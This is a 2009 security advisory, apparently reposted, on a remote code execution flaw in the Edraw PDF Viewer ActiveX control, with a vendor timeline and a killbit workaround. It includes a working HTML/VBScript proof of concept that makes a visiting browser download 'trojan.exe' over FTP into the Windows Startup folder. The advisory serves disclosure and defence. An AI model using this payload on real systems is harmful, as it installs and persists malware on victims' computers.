Edraw PDF Viewer Component < ActiveX Insecure Method Vuln
来源:Nevis Labs 作者:Jambalaya 发布时间:2009-06-19
Edraw PDF Viewer Component ActiveX Remote code execution vulnerability
By Jambalaya of Nevis Labs Date: 2009.06.16
Vender: EdrawSoft
Affected: Edraw PDF Viewer Component < *other version may also be affected
Overview: "Edraw PDF Viewer Component is a light weight ActiveX Control which enables your application to display and interact with PDF files.It is identical to Adobe Reader program and adds high speed viewing of PDF documents to your applications easily." For more information, see the vendor's site found at the following link: http://www.ocxt.com
Details: The specific flaws exists in pdfviewer.ocx ActiveX control.Succssfully exploiting this vulnerability allows attackers to execute arbitrary code on vulnerable installation. The vulnerability exists due to FtpConnect() function, which could download any file from remote FTP server and put on user's disk.Malicious user could download trojan and put into "startup" folder so that the trojan will run up when user's computer restart. Successful exploitation requires that the target user browse to a malicious web page.
Proof of Concept: <html> <body> <BR><object classid="clsid:44A8091F-8F01-43B7-8CF7-4BBA71E61E04" id="target" width="67" height="50" codebase="http://www.ocxt.com/download/officeviewer.cab#6,0,612,1"></object> <BR><BR> <script language="vbscript"> target.FtpConnect "", "test", "tester" target.FtpDownloadFile "trojan.exe", "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\trojan.exe" target.FtpDisConnect </script> </body> </html>
Workaround: Set a killbit for this ActiveX.
Vendor Response: 2009.06.16 Vendor notified via email 2009.06.17 Vendor respond, and release patch
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